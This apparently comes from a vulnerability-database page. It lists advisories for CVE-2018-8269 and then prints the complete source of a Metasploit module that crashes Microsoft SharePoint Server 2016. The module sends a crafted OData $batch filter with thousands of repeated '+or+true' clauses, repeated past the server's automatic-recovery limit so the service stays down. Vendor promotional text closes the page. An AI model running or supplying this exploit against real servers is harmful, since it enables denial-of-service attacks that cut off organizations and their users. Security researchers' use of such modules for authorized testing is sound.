| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Microsoft Office SharePoint Server 2016 - Denial of Service Exploit | 9 Jan 201900:00 | – | zdt | |
| Security Bulletin: Multiple Vulnerabilities may affect IBM Robotic Process Automation | 4 May 202218:53 | – | ibm | |
| Microsoft OData Denial of Service Vulnerability | 12 Sep 201800:00 | – | cnvd | |
| CVE-2018-8269 | 13 Sep 201800:00 | – | cve | |
| CVE-2018-8269 | 13 Sep 201800:00 | – | cvelist | |
| Microsoft Office SharePoint Server 2016 - Denial of Service (Metasploit) | 9 Jan 201900:00 | – | exploitpack | |
| Denial of service in ASP.NET Core | 16 Oct 201819:58 | – | github | |
| KLA11315 Multiple vulnerabilities in Microsoft Developer Tools | 11 Sep 201800:00 | – | kaspersky | |
| OData Denial of Service Vulnerability | 11 Sep 201807:00 | – | mscve | |
| CVE-2018-8269 | 13 Sep 201800:29 | – | nvd |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'sharepoint-ruby'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'DOS Vulnerability in SharePoint 2016 Server',
'Description' => %q{
A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable.
The vulnerability is a result of the dependency SharePoint has in Microsoft.Data.OData library which was
vulnerable to remote DOS (See CVE-2018-8269). The exploit is done by sending a crafted request that contains
an OData filter that triggers the vulnerability in Microsoft.Data.OData library. Sending such request, will
terminate the process that runs the server. By default, SharePoint server is configured to recover a
terminated process, but it will do so only 10 times. If more than 10 malicious requests are sent in 5
minutes interval, the server will not recover and will be down until it is manually restarted.
},
'Author' =>
[
'Gil Mirmovitch', # Vulnerability discover and poc
'Gal Zror' # Metasploit module
],
'Platform' => 'win',
'References' =>
[
[ 'CVE', '2018-8269' ],
[ 'ALEPH', '2018002' ]
],
'Targets' =>
[
[ 'Microsoft Office SharePoint Server 2016', { } ],
],
))
register_options(
[
Opt::RPORT(443),
OptString.new('SSL', [true, 'Negotiate SSL/TLS for outgoing connections', true]),
OptString.new('USERNAME', [true, 'The username to login with']),
OptString.new('PASSWORD', [true, 'The password to login with']),
OptString.new('VHOST', [true, 'HTTP server virtual host'])
], self.class)
end
def fetch_auth_cookie
print_status("Fetching Authentication Cookie")
begin
site = Sharepoint::Site.new vhost, 'server-relative-site-url'
site.session.authenticate datastore['USERNAME'], datastore['PASSWORD']
return site.session.cookie
rescue Sharepoint::Session::AuthenticationFailed
fail_with(Failure::NoAccess, "Authentication failed")
end
print_good("Authentication Succeeded")
end
def extract_digest_value(cookie)
token_api_uri = '/_api/contextinfo'
res = send_request_cgi( {
'method' => 'POST',
'uri' => normalize_uri(token_api_uri),
'cookie' => cookie,
})
if res.nil?
fail_with(Failure::UnexpectedReply, "Empty context response")
end
res.get_xml_document.xpath('//d:FormDigestValue').text
end
def send_dos_request
send_request(6100)
end
def send_innocent_request
send_request(5)
end
def send_request(reps)
vuln_api_uri = "/_api/$batch"
cookie = datastore['COOKIE']
data = Rex::MIME::Message.new
data.add_part(
"GET /_api/web/lists?$filter=true" + "+or+true" * reps + " HTTP/1.1\r\n" +
"accept: application/json;odata.metadata=minimal\r\n", #Data is our payload
'application/http', #Content Type
'binary', #Transfer Encoding
nil #Content Disposition
)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(vuln_api_uri),
'ctype' => "multipart/mixed; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie,
'headers' => {
'x-requestdigest' => extract_digest_value(cookie),
}
})
end
def dos
print_status("Sending DOS malicious requests...")
(0..10).each {|i|
print_status("Countdown #{10 - i}...")
send_dos_request
sleep(60)
}
end
def check
datastore['COOKIE'] = fetch_auth_cookie
print_status("Sending innocent request...")
res = send_innocent_request
if res && res.code == 200
print_good("Server responded 200 to innocent request")
else
print_bad("Server response " + res.code.to_s + " to innocent request")
return Exploit::CheckCode::Unknown
end
print_status("Sending malicious request...")
res = send_dos_request
if res.nil?
Exploit::CheckCode::Vulnerable
else
print_bad("Server response " + res.code.to_s + " to malicious request")
Exploit::CheckCode::Safe
end
end
def run
if check == Exploit::CheckCode::Vulnerable
dos
end
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation